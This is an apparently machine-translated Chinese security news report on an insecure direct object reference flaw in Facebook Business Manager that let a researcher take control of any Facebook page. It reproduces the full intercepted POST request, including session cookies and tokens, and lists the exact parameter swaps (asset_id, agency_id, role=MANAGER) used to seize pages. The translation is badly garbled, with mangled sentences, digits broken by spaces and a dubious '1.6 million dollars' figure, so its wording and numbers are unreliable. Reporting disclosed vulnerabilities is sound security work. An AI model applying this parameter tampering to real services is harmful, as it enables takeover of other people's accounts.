Within ten seconds of black off the Facebook home page? This vulnerability turned out to the value 1. 6 million dollars including vulnerability analysis-vulnerability warning-the black bar safety net

2016-09-20T00:00:00
ID MYHACK58:62201679425
Type myhack58
Reporter 佚名
Modified 2016-09-20T00:00:00

Description

! How to black out your Facebook for? The man from India safe studies experts say have something to say. According to the foreign media to the latest reports, a man named ArunSureshkumar of India security experts at Facebook“Business Management Platform”for BusinessManager found a serious vulnerability, an attacker could exploit the vulnerability to attack anyone's Facebook home page. Facebook Management Platform BusinessManager is what? “Enterprise management platform”can help companies, advertising agencies, or marketing personnel in a unified interface, centralized management of company's Facebook pages, ad accounts, as well as a method of payment, thus avoiding managers need to constantly switch interface of the embarrassing situation. ! Large enterprises owned usually have more than one Facebook fan page, and these page and each has a different market positioning and target. For business managers,“business management platform”can help them in the same interface to manage all the fan pages and ad accounts, not only that, they can also view, remove, or change the corresponding user permissions. While each Facebook Fan Page the Manager can log in to“Enterprise Management Platform”, and direct access to the AD accounts and pages of various information. At this point will not be to the employers to display all of the Facebook profile will only display your name, company name, and ad account information, so managers don't have to worry about the need to be working on contacting people as Facebook friends. Insecure direct object reference In the US for this attack technical analysis before, please allow me first to tell you about“insecure direct object reference”concept. According to the OWASP project the open Web application security project provides a definition of when a Web Application according to user provided input information to provide the user of the object direct access, then this is an insecure direct object reference. This vulnerability will allow an attacker to bypass the system's authentication mechanisms, and direct access to the network system, all resources. According to the OWASP project official providing information: “Insecure direct object reference will allow an attacker to bypass the system's authentication mechanism, and you can modify the object referenced by the parameter values to directly access system resources. These resources may belong to other users of the database data, it is also possible that stored in file system in file. If the Web application in the absence of user input datasecurity testingin the case of directly provided to the user requesting access to objects, then there will be this unsafe situation.” Facebook vulnerability analysis Sureshkumar in the Facebook of the enterprise management platform, found a IDOR(InsecureDirect Object References)vulnerability, and in this vulnerability, he can in ten seconds to get to any Facebook home page control. Sureshkumar with his Facebook account ID=9 0 7 9 7 0 5 5 5 9 8 1 5 2 4 add a test account as a partner account the partner account ID 9 9 1 0 7 9 8 7 0 9 7 5 7 8 8 The. He in testing using BurpSuite to intercept the Facebook network request information, and modify the request part of the data. Sureshkumar in his published analysis report in the published vulnerabilities of network request to data: POST /business_share/asset_to_agency/? dpr=2 HTTP/1.1

Host: business.facebook.com

Connection: close

Content-Length: 4 3 6

Origin: https://business.facebook.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Accept: /

Referer:https://business. facebook. com/settings/pages/5 3 6 1 9 5 3 9 3 1 9 9 0 7 5? business_id=9 0 7 9 7 0 5 5 5 9 8 1 5 2 4

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.8

Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB;sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA;c_user=1 0 0 0 0 0 7 7 1 6 8 0 6 9 4; xs=2 5%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837;fr=05UM8RW0tTkDVgbSW. AWUB4pn0DvP1fQoqywWeORlj_LE. BXN2EF. IL. FfD. 0. 0. BXxBSo. AWXdKm2I;csm=2; s=Aa50vjfSfyFHHmC1. BXwxOY; _ga=GA1. 2. 1 7 7 3 9 4 8 0 7 3. 1 4 6 4 6 6 8 6 6 7; p=-2;presence=EDvF3EtimeF1472469215EuserFA21B00771680694a2estatefdutf1472469215051cechfdp_5f1b00771680694f7cc;act=1 4 7 2 4 6 9 2 3 3 4 5 8%2F6

parent_business_id=9 0 7 9 7 0 5 5 5 9 8 1 5 2 4&agency_id=9 9 1 0 7 9 8 7 0 9 7 5 7 8 8&asset_id=5 3 6 1 9 5 3 9 3 1 9 9 0 7 5&role=MANAGER&__user=1 0 0 0 0 0 7 7 1 6 8 0 6 9 4&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8Smqvuzxeuw4ohaxwdwsdbzovu-eBCy8b48xicx2aGewzwEx2qEN4yECcKbby9onwfwhcbxungxkdaw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=2 6 5 8 1 7 2 1 1 1 7 6 7 1 1 0 4 4 9 7 2 8 5 1 0 9 1 0 2 5 8 6 5 8 1 7 1 8 4 5 2 1 0 2 6 8 7 0 4 9 4 5 1 1 0 8 1&__rev=2 5 3 0 7 3 3 Then get these data, how to attack Facebook home page? He used to target Facebook account ID value is replaced with the requested data in the“asset_id”parameter value, and then exchange the“parent_business_id”and“agency_id”value. In addition, he will also“role”parameter value is modified into the“MANAGER”. parent_business_id= 9 9 1 0 7 9 8 7 0 9 7 5 7 8 8

agency_id= 9 0 7 9 7 0 5 5 5 9 8 1 5 2 4

asset_id =1 9 0 3 1 3 4 6 1 3 8 1 0 2 2

role= MANAGER ! By the above the series after the operation, Sureshkumar demonstrates how to attack a Facebook page, and get to the Business Management Platform page of the administrator privileges. In addition, Sureshkumar also posted a attack demo video.

[1] [2] next